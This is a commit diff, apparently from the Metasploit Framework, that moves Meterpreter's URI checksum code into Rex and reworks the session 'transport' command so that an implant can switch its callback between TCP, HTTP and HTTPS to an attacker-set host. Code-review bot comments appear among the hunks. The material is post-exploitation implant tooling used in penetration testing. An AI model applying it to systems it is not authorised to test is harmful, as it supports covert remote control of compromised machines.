
Commit c0f4961

committed
Rejig code to support http payloads
* Move the uri checksum code to a spot that can be shared with rex. * Adjust modules to make use of this new location. * Fix up the transport switcher to add the URI for those payloads.
1 parent 1f00b59 commit c0f4961


5 files changed

+38
-23
lines changed

5 files changed

+38
-23
lines changed

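--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -1,8 +1,8 @@
 # -*- coding: binary -*-
 require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
-require 'msf/core/handler/reverse_http/uri_checksum'
 require 'rex/payloads/meterpreter/patch'
+require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/parser/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 
@@ -17,7 +17,7 @@ module Handler
 module ReverseHttp
 
 include Msf::Handler
-include Msf::Handler::ReverseHttp::UriChecksum
+include Rex::Payloads::Meterpreter::UriChecksum
 include Msf::Payload::Windows::VerifySsl
 
 #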

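--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/rex/payloads/meterpreter/uri_checksum.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
-module Msf
-module Handler
-module ReverseHttp
+module Rex
+module Payloads
+module Meterpreter
 module UriChecksum
 
 #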

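--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -11,6 +11,12 @@
 # Provides methods to patch options into the metsrv stager.
 require 'rex/payloads/meterpreter/patch'
 
+# URI checksum calculation
+require 'rex/payloads/meterpreter/uri_checksum'
+
+# URI checksumming stuff
+require 'msf/core/handler/reverse_https'
+
 module Rex
 module Post
 module Meterpreter
@@ -28,6 +34,8 @@ class ClientCore < Extension
 UNIX_PATH_MAX = 108
 DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
 
+include Rex::Payloads::Meterpreter::UriChecksum
+
 #
 # Initializes the 'core' portion of the meterpreter client commands.
 #
@@ -226,14 +234,17 @@ def change_transport(opts={})
 request = Packet.create_request('core_change_transport')
 
 url = "#{opts[:scheme]}://#{opts[:lhost]}:#{opts[:lport]}"
-url << '/' + opts[:suffix] if opts[:suffix]
+
+if opts[:adduri]
+checksum = generate_uri_checksum(URI_CHECKSUM_CONN)
+rand = Rex::Text.rand_text_alphanumeric(16)
+url << "/#{checksum}_#{rand}/"
+end
 
 request.add_tlv(TLV_TYPE_TRANSPORT_TYPE, opts[:type])
 request.add_tlv(TLV_TYPE_TRANSPORT_URL, url)
 
 response = client.send_request(request)
-
-# TODO: shut this baby down.
 end
 
 #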
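Review bot: The added `require 'msf/core/handler/reverse_https'` under the `# URI checksumming stuff` comment in the first hunk looks redundant and pulls an Msf handler into a lib/rex file, which is exactly the dependency that moving UriChecksum into Rex::Payloads::Meterpreter was meant to remove; `generate_uri_checksum` and `URI_CHECKSUM_CONN` already come from the `rex/payloads/meterpreter/uri_checksum` require and the `include` in the second hunk. Unless something outside these hunks needs it, I would drop both the comment and that require. In `change_transport` (its `def` line is outside the hunk) the local `rand` shadows `Kernel#rand`; `rand_part = Rex::Text.rand_text_alphanumeric(16)` reads better. Callers that still pass `:suffix` now silently get no path appended, so a one-line comment on the `if opts[:adduri]` branch saying that `:adduri` replaces the old `:suffix` option would help the next reader.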

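--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -18,6 +18,18 @@ class Console::CommandDispatcher::Core
 
 include Console::CommandDispatcher
 
+METERPRETER_TRANSPORT_SSL = 0
+METERPRETER_TRANSPORT_HTTP = 1
+METERPRETER_TRANSPORT_HTTPS = 2
+
+VALID_TRANSPORTS = {
+'reverse_tcp' => METERPRETER_TRANSPORT_SSL,
+'reverse_http' => METERPRETER_TRANSPORT_HTTP,
+'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
+'bind_tcp' => METERPRETER_TRANSPORT_SSL
+}
+
+
 #
 # Initializes an instance of the core command set using the supplied shell
 # for interactivity.
@@ -327,11 +339,8 @@ def cmd_transport(*args)
 return true
 end
 
-# the order of these is important (hacky!)
-valid_transports = ['reverse_tcp', 'reverse_http', 'reverse_https', 'bind_tcp']
-
 transport = args.shift.downcase
-unless valid_transports.include?(transport)
+unless VALID_TRANSPORTS.has_key?(transport)
 #cmd_transport_help
 end
 
@@ -342,30 +351,25 @@ def cmd_transport(*args)
 
 lhost = ""
 lport = args.shift.to_i
-type = 0
 else
 unless args.length == 2
 #cmd_transport_help
 end
 
 lhost = args.shift
 lport = args.shift.to_i
-type = valid_transports.index(transport)
-end
-
-suffix = nil
-unless transport.ends_with?("tcp")
-suffix = "some magic URL"
 end
 
+print_status("Swapping transport ...")
 client.core.change_transport({
-:type => type,
+:type => VALID_TRANSPORTS[transport],
 :scheme => transport.split('_')[1],
 :lhost => lhost,
 :lport => lport,
-:suffix => suffix
+:adduri => !transport.ends_with?('tcp')
 })
-
+client.shutdown_passive_dispatcher
+shell.stop
 end
 
 def cmd_migrate_help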
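Review bot: The `unless VALID_TRANSPORTS.has_key?(transport)` check in the second hunk still has only the commented-out `#cmd_transport_help` as its body and no early return, so an unknown transport name falls through to the third hunk and `change_transport` is sent `:type => VALID_TRANSPORTS[transport]`, i.e. `nil`, plus a `:scheme` derived from whatever was typed, and the session is then torn down with `shell.stop`; the `unless args.length == 2` check has the same shape. The guard should actually stop the command, for example `unless VALID_TRANSPORTS.has_key?(transport)` / `print_error("Unknown transport: #{transport}")` / `return true`. `VALID_TRANSPORTS` in the first hunk is a mutable constant and should end with `}.freeze`, and the two blank lines after it can be reduced to one. The `def cmd_transport` line and its opening argument guard are outside these hunks.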

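--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -37,7 +37,7 @@ def initialize(info = {})
 end
 
 def generate
-checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
+checksum = generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN)
 rand = Rex::Text.rand_text_alphanumeric(16)
 url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
 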